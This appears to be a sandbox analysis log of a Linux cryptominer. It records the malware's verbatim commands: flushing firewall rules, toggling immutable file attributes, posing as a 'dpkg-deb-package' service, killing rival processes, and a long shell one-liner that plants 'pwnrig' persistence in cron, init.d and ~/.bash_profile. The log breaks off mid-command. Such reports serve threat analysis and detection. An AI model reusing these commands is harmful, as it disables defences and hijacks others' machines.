iptables -Z ufw-skip-to-policy-forward
4⤵
PID:1503

/sbin/iptables
iptables -Z ufw-reject-forward
4⤵
PID:1504

/sbin/iptables
iptables -Z ufw-after-logging-forward
4⤵
PID:1505

/sbin/iptables
iptables -Z ufw-after-forward
4⤵
PID:1506

/sbin/iptables
iptables -Z ufw-user-logging-forward
4⤵
PID:1507

/sbin/iptables
iptables -Z ufw-user-forward
4⤵
PID:1508

/sbin/iptables
iptables -Z ufw-before-forward
4⤵
PID:1509

/sbin/iptables
iptables -Z ufw-before-logging-forward
4⤵
PID:1510

/sbin/iptables
iptables -Z ufw-track-forward
4⤵
PID:1511

/sbin/iptables
iptables -Z ufw-track-output
4⤵
PID:1512

/sbin/iptables
iptables -Z ufw-track-input
4⤵
PID:1513

/sbin/iptables
iptables -Z ufw-skip-to-policy-output
4⤵
PID:1514

/sbin/iptables
iptables -Z ufw-reject-output
4⤵
PID:1515

/sbin/iptables
iptables -Z ufw-after-logging-output
4⤵
PID:1516

/sbin/iptables
iptables -Z ufw-after-output
4⤵
PID:1517

/sbin/iptables
iptables -Z ufw-user-logging-output
4⤵
PID:1518

/sbin/iptables
iptables -Z ufw-user-output
4⤵
PID:1519

/sbin/iptables
iptables -Z ufw-before-output
4⤵
PID:1520

/sbin/iptables
iptables -Z ufw-before-logging-output
4⤵
PID:1521

/sbin/iptables
iptables -X ufw-logging-deny
4⤵
PID:1522

/sbin/iptables
iptables -X ufw-logging-allow
4⤵
PID:1523

/sbin/iptables
iptables -X ufw-not-local
4⤵
PID:1524

/sbin/iptables
iptables -X ufw-user-logging-input
4⤵
PID:1525

/sbin/iptables
iptables -X ufw-user-logging-output
4⤵
PID:1526

/sbin/iptables
iptables -X ufw-user-logging-forward
4⤵
PID:1527

/sbin/iptables
iptables -X ufw-user-limit-accept
4⤵
PID:1528

/sbin/iptables
iptables -X ufw-user-limit
4⤵
PID:1529

/sbin/iptables
iptables -X ufw-user-input
4⤵
PID:1530

/sbin/iptables
iptables -X ufw-user-forward
4⤵
PID:1531

/sbin/iptables
iptables -X ufw-user-output
4⤵
PID:1532

/sbin/iptables
iptables -X ufw-skip-to-policy-input
4⤵
PID:1533

/sbin/iptables
iptables -X ufw-skip-to-policy-output
4⤵
PID:1534

/sbin/iptables
iptables -X ufw-skip-to-policy-forward
4⤵
PID:1535

/sbin/iptables
iptables -P INPUT ACCEPT
4⤵
PID:1536

/sbin/iptables
iptables -P OUTPUT ACCEPT
4⤵
PID:1537

/sbin/iptables
iptables -P FORWARD ACCEPT
4⤵
PID:1538

/sbin/ip6tables
ip6tables -F ufw6-logging-deny
4⤵
PID:1539

/sbin/ip6tables
ip6tables -F ufw6-logging-allow
4⤵
PID:1540

/sbin/ip6tables
ip6tables -F ufw6-not-local
4⤵
PID:1541

/sbin/ip6tables
ip6tables -F ufw6-user-logging-input
4⤵
PID:1542

/sbin/ip6tables
ip6tables -F ufw6-user-limit-accept
4⤵
PID:1543

/sbin/ip6tables
ip6tables -F ufw6-user-limit
4⤵
PID:1544

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-input
4⤵
PID:1545

/sbin/ip6tables
ip6tables -F ufw6-reject-input
4⤵
PID:1546

/sbin/ip6tables
ip6tables -F ufw6-after-logging-input
4⤵
PID:1547

/sbin/ip6tables
ip6tables -F ufw6-after-input
4⤵
PID:1548

/sbin/ip6tables
ip6tables -F ufw6-user-input
4⤵
PID:1549

/sbin/ip6tables
ip6tables -F ufw6-before-input
4⤵
PID:1550

/sbin/ip6tables
ip6tables -F ufw6-before-logging-input
4⤵
PID:1551

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-forward
4⤵
PID:1552

/sbin/ip6tables
ip6tables -F ufw6-reject-forward
4⤵
PID:1553

/sbin/ip6tables
ip6tables -F ufw6-after-logging-forward
4⤵
PID:1554

/sbin/ip6tables
ip6tables -F ufw6-after-forward
4⤵
PID:1555

/sbin/ip6tables
ip6tables -F ufw6-user-logging-forward
4⤵
PID:1556

/sbin/ip6tables
ip6tables -F ufw6-user-forward
4⤵
PID:1557

/sbin/ip6tables
ip6tables -F ufw6-before-forward
4⤵
PID:1558

/sbin/ip6tables
ip6tables -F ufw6-before-logging-forward
4⤵
PID:1559

/sbin/ip6tables
ip6tables -F ufw6-track-forward
4⤵
PID:1560

/sbin/ip6tables
ip6tables -F ufw6-track-output
4⤵
PID:1561

/sbin/ip6tables
ip6tables -F ufw6-track-input
4⤵
PID:1562

/sbin/ip6tables
ip6tables -F ufw6-skip-to-policy-output
4⤵
PID:1563

/sbin/ip6tables
ip6tables -F ufw6-reject-output
4⤵
PID:1564

/sbin/ip6tables
ip6tables -F ufw6-after-logging-output
4⤵
PID:1565

/sbin/ip6tables
ip6tables -F ufw6-after-output
4⤵
PID:1566

/sbin/ip6tables
ip6tables -F ufw6-user-logging-output
4⤵
PID:1567

/sbin/ip6tables
ip6tables -F ufw6-user-output
4⤵
PID:1568

/sbin/ip6tables
ip6tables -F ufw6-before-output
4⤵
PID:1569

/sbin/ip6tables
ip6tables -F ufw6-before-logging-output
4⤵
PID:1570

/sbin/ip6tables
ip6tables -Z ufw6-logging-deny
4⤵
PID:1571

/sbin/ip6tables
ip6tables -Z ufw6-logging-allow
4⤵
PID:1572

/sbin/ip6tables
ip6tables -Z ufw6-not-local
4⤵
PID:1573

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-input
4⤵
PID:1574

/sbin/ip6tables
ip6tables -Z ufw6-user-limit-accept
4⤵
PID:1575

/sbin/ip6tables
ip6tables -Z ufw6-user-limit
4⤵
PID:1576

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-input
4⤵
PID:1577

/sbin/ip6tables
ip6tables -Z ufw6-reject-input
4⤵
PID:1578

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-input
4⤵
PID:1579

/sbin/ip6tables
ip6tables -Z ufw6-after-input
4⤵
PID:1580

/sbin/ip6tables
ip6tables -Z ufw6-user-input
4⤵
PID:1581

/sbin/ip6tables
ip6tables -Z ufw6-before-input
4⤵
PID:1582

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-input
4⤵
PID:1583

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-forward
4⤵
PID:1584

/sbin/ip6tables
ip6tables -Z ufw6-reject-forward
4⤵
PID:1585

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-forward
4⤵
PID:1586

/sbin/ip6tables
ip6tables -Z ufw6-after-forward
4⤵
PID:1587

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-forward
4⤵
PID:1588

/sbin/ip6tables
ip6tables -Z ufw6-user-forward
4⤵
PID:1589

/sbin/ip6tables
ip6tables -Z ufw6-before-forward
4⤵
PID:1590

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-forward
4⤵
PID:1591

/sbin/ip6tables
ip6tables -Z ufw6-track-forward
4⤵
PID:1592

/sbin/ip6tables
ip6tables -Z ufw6-track-output
4⤵
PID:1593

/sbin/ip6tables
ip6tables -Z ufw6-track-input
4⤵
PID:1594

/sbin/ip6tables
ip6tables -Z ufw6-skip-to-policy-output
4⤵
PID:1595

/sbin/ip6tables
ip6tables -Z ufw6-reject-output
4⤵
PID:1596

/sbin/ip6tables
ip6tables -Z ufw6-after-logging-output
4⤵
PID:1597

/sbin/ip6tables
ip6tables -Z ufw6-after-output
4⤵
PID:1598

/sbin/ip6tables
ip6tables -Z ufw6-user-logging-output
4⤵
PID:1599

/sbin/ip6tables
ip6tables -Z ufw6-user-output
4⤵
PID:1600

/sbin/ip6tables
ip6tables -Z ufw6-before-output
4⤵
PID:1601

/sbin/ip6tables
ip6tables -Z ufw6-before-logging-output
4⤵
PID:1602

/sbin/ip6tables
ip6tables -X ufw6-logging-deny
4⤵
PID:1603

/sbin/ip6tables
ip6tables -X ufw6-logging-allow
4⤵
PID:1604

/sbin/ip6tables
ip6tables -X ufw6-not-local
4⤵
PID:1605

/sbin/ip6tables
ip6tables -X ufw6-user-logging-input
4⤵
PID:1606

/sbin/ip6tables
ip6tables -X ufw6-user-logging-output
4⤵
PID:1607

/sbin/ip6tables
ip6tables -X ufw6-user-logging-forward
4⤵
PID:1608

/sbin/ip6tables
ip6tables -X ufw6-user-limit-accept
4⤵
PID:1609

/sbin/ip6tables
ip6tables -X ufw6-user-limit
4⤵
PID:1610

/sbin/ip6tables
ip6tables -X ufw6-user-input
4⤵
PID:1611

/sbin/ip6tables
ip6tables -X ufw6-user-forward
4⤵
PID:1612

/sbin/ip6tables
ip6tables -X ufw6-user-output
4⤵
PID:1613

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-input
4⤵
PID:1614

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-output
4⤵
PID:1615

/sbin/ip6tables
ip6tables -X ufw6-skip-to-policy-forward
4⤵
PID:1616

/sbin/ip6tables
ip6tables -P INPUT ACCEPT
4⤵
PID:1617

/sbin/ip6tables
ip6tables -P OUTPUT ACCEPT
4⤵
PID:1618

/sbin/ip6tables
ip6tables -P FORWARD ACCEPT
4⤵
PID:1619

/usr/bin/bash
bash -c "iptables -P INPUT ACCEPT"
2⤵
PID:1620

/usr/sbin/iptables
iptables -P INPUT ACCEPT
2⤵
PID:1620

/usr/bin/bash
bash -c "iptables -P OUTPUT ACCEPT"
2⤵
PID:1621

/usr/sbin/iptables
iptables -P OUTPUT ACCEPT
2⤵
PID:1621

/usr/bin/bash
bash -c "iptables -P FORWARD ACCEPT"
2⤵
PID:1622

/usr/sbin/iptables
iptables -P FORWARD ACCEPT
2⤵
PID:1622

/usr/bin/bash
bash -c "iptables -F"
2⤵
PID:1623

/usr/sbin/iptables
iptables -F
2⤵
- Flushes firewall rules
PID:1623

/usr/bin/bash
bash -c "chattr -ia /etc/ld.so.preload"
2⤵
PID:1624

/usr/bin/chattr
chattr -ia /etc/ld.so.preload
2⤵
- Attempts to change immutable files
PID:1624

/usr/bin/lsof
lsof -t -i :444
2⤵
- Attempts to change immutable files
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1625

/usr/bin/lsof
lsof -t -i :59475
2⤵
- Attempts to change immutable files
- Enumerates active TCP sockets
- Reads system network configuration
- Reads runtime system information
PID:1626

/usr/bin/pgrep
pgrep -f ksysrvthread
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1627

/usr/bin/pgrep
pgrep -f sysrv
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1628

/usr/bin/pgrep
pgrep -f klibsystem4
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1629

/usr/bin/pgrep
pgrep -f klibsystem5
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1630

/usr/bin/chattr
chattr +ia /etc/init.d/dpkg-deb-package
2⤵
- Attempts to change immutable files
PID:1631

/etc/init.d/dpkg-deb-package
/etc/init.d/dpkg-deb-package start
2⤵
- Executes dropped EXE
PID:1633

/usr/bin/cp
cp -f -r -- /bin/dpkg-debian /bin/dpkg-deb-package
3⤵
PID:1635

/usr/bin/rm
rm -rf -- dpkg-deb-package
3⤵
PID:1637

/usr/bin/chattr
chattr +ia /etc/systemd/system/dpkg-deb-package.service
2⤵
- Attempts to change immutable files
PID:1638

/usr/bin/systemctl
systemctl daemon-reload
2⤵
- Reads EFI boot settings
PID:1639

/tmp/-python37-590b56ce-9e47-4539-accf-0eb74a649a38
/tmp/-python37-590b56ce-9e47-4539-accf-0eb74a649a38
2⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:1640

/tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
/tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
PID:1642

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
3⤵
- Attempts to change immutable files
PID:1668

/usr/bin/hostname
hostname -I
4⤵
- Attempts to change immutable files
PID:1671

/usr/bin/awk
awk "{print \$1}"
4⤵
PID:1673

/usr/bin/awk
awk "{print \"-\"\$2}"
4⤵
PID:1678

/usr/bin/head
head -n 1
4⤵
PID:1677

/usr/bin/grep
grep "Port "
4⤵
PID:1676

/usr/bin/cat
cat /etc/ssh/sshd_config
4⤵
PID:1675

/usr/bin/whoami
whoami
4⤵
PID:1679

/usr/bin/hostname
hostname
4⤵
PID:1680

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
4⤵
- Checks CPU configuration
PID:1681

/usr/bin/sed
sed -e "s/\$//"
4⤵
PID:1687

/usr/bin/sed
sed -e "s/^ *//"
4⤵
PID:1686

/usr/bin/cut
cut -d: -f2
4⤵
PID:1685

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
4⤵
- Checks CPU configuration
PID:1684

/usr/bin/awk
awk "{print \$1}"
4⤵
- Reads runtime system information
PID:1690

/usr/bin/awk
awk "{print \$4}"
4⤵
PID:1693

/usr/bin/awk
awk "{print \$4}"
4⤵
PID:1696

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
3⤵
PID:1697

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
4⤵
PID:1699

/usr/bin/ps
ps -A "-ostat,ppid"
4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1698

/usr/bin/id
id -u
4⤵
PID:1701

/usr/bin/grep
grep -v grep
4⤵
PID:1704

/usr/bin/grep
grep /etc/cron
4⤵
PID:1703

/usr/bin/ps
ps x
4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1702

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
3⤵
PID:1706

/usr/bin/id
id -u
4⤵
PID:1707

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
4⤵
PID:1712

/usr/bin/grep
grep -v /usr/sbin/httpd
4⤵
PID:1711

/usr/bin/grep
grep -v -- "-bash[[:space:]]*\$"
4⤵
PID:1710

/usr/bin/grep
grep -v grep
4⤵
PID:1709

/usr/bin/ps
ps aux
4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1708

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
3⤵
PID:1731

/usr/bin/id
id -u
4⤵
PID:1732

/usr/bin/wc
wc -l
4⤵
PID:1739

/usr/bin/awk
awk "{if(\$3>30.0) print \$2}"
4⤵
PID:1738

/usr/bin/grep
grep -- "-bash[[:space:]]*\$"
4⤵
PID:1736

/usr/bin/grep
grep -v grep
4⤵
PID:1735

/usr/bin/ps
ps aux
4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1734

/usr/bin/systemctl
systemctl enable dpkg-deb-package.service
2⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:1727

/lib/systemd/systemd-sysv-install
/lib/systemd/systemd-sysv-install enable dpkg-deb-package
3⤵
- Attempts to change immutable files
PID:1728

/usr/bin/getopt
getopt -o r: --long root: -- enable dpkg-deb-package
4⤵
PID:1729

/usr/sbin/update-rc.d
/usr/sbin/update-rc.d dpkg-deb-package defaults
4⤵
PID:1730

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1737

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:1737

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1737

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
PID:1737

/usr/sbin/update-rc.d
/usr/sbin/update-rc.d dpkg-deb-package enable
4⤵
PID:1771

/usr/local/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1772

/usr/local/bin/systemctl
systemctl daemon-reload
5⤵
PID:1772

/usr/sbin/systemctl
systemctl daemon-reload
5⤵
PID:1772

/usr/bin/systemctl
systemctl daemon-reload
5⤵
- Reads EFI boot settings
- Enumerates kernel/hardware configuration
PID:1772

/usr/bin/chattr
chattr +ia /bin/dpkg-debian
2⤵
- Attempts to change immutable files
PID:1824

/usr/bin/crontab
crontab -r
2⤵
PID:1825

/usr/bin/pkill
pkill -f .klibsystem4
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1826

/usr/bin/bash
bash -c "echo \"5 * * * * nohup /var/tmp/.klibsystem5 >/dev/null 2>&1 &\" | crontab -"
2⤵
PID:1827

/usr/bin/crontab
crontab -
3⤵
- Creates/modifies Cron job
PID:1829

/usr/bin/chattr
chattr +ia /etc/cron.d/.lib-knlib4
2⤵
- Attempts to change immutable files
PID:1830

/usr/bin/chattr
chattr +ia /var/spool/cron/.lib-knlib4
2⤵
- Attempts to change immutable files
PID:1831

/usr/bin/chattr
chattr +ia /etc/cron.hourly/.lib-knlib4
2⤵
- Attempts to change immutable files
PID:1832

/usr/bin/chattr
chattr +ia /etc/cron.daily/.lib-knlib4
2⤵
- Attempts to change immutable files
PID:1833

/usr/bin/chattr
chattr +ia /etc/cron.weekly/.lib-knlib4
2⤵
- Attempts to change immutable files
PID:1834

/usr/bin/chattr
chattr +ia /etc/cron.monthly/.lib-knlib4
2⤵
- Attempts to change immutable files
PID:1835

/usr/bin/chattr
chattr -ia /etc/anacrontab
2⤵
- Attempts to change immutable files
PID:1836

/usr/bin/chattr
chattr +ia /etc/anacrontab
2⤵
- Attempts to change immutable files
PID:1837

/tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571
/tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
2⤵
- Executes dropped EXE
- Checks hardware identifiers (DMI)
- Reads hardware information
- Checks CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
PID:1838

/bin/sh
sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
3⤵
- Attempts to change immutable files
PID:1839

/usr/bin/hostname
hostname -I
4⤵
- Attempts to change immutable files
PID:1842

/usr/bin/awk
awk "{print \$1}"
4⤵
PID:1844

/usr/bin/awk
awk "{print \"-\"\$2}"
4⤵
PID:1849

/usr/bin/head
head -n 1
4⤵
PID:1848

/usr/bin/grep
grep "Port "
4⤵
PID:1847

/usr/bin/cat
cat /etc/ssh/sshd_config
4⤵
PID:1846

/usr/bin/whoami
whoami
4⤵
PID:1850

/usr/bin/hostname
hostname
4⤵
PID:1851

/usr/bin/grep
grep -c "^processor" /proc/cpuinfo
4⤵
- Checks CPU configuration
PID:1852

/usr/bin/sed
sed -e "s/^ *//"
4⤵
PID:1857

/usr/bin/sed
sed -e "s/\$//"
4⤵
PID:1858

/usr/bin/cut
cut -d: -f2
4⤵
PID:1856

/usr/bin/grep
grep -m 1 "model name" /proc/cpuinfo
4⤵
- Checks CPU configuration
PID:1855

/usr/bin/awk
awk "{print \$1}"
4⤵
PID:1861

/usr/bin/awk
awk "{print \$4}"
4⤵
PID:1864

/usr/bin/awk
awk "{print \$4}"
4⤵
PID:1867

/bin/sh
sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
3⤵
PID:1868

/usr/bin/awk
awk "/[zZ]/ && !a[\$2]++ {print \$2}"
4⤵
PID:1870

/usr/bin/ps
ps -A "-ostat,ppid"
4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1869

/usr/bin/id
id -u
4⤵
PID:1872

/usr/bin/grep
grep -v grep
4⤵
PID:1875

/usr/bin/grep
grep /etc/cron
4⤵
PID:1874

/usr/bin/ps
ps x
4⤵
- Reads CPU attributes
- Reads runtime system information
PID:1873

/bin/sh
sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > 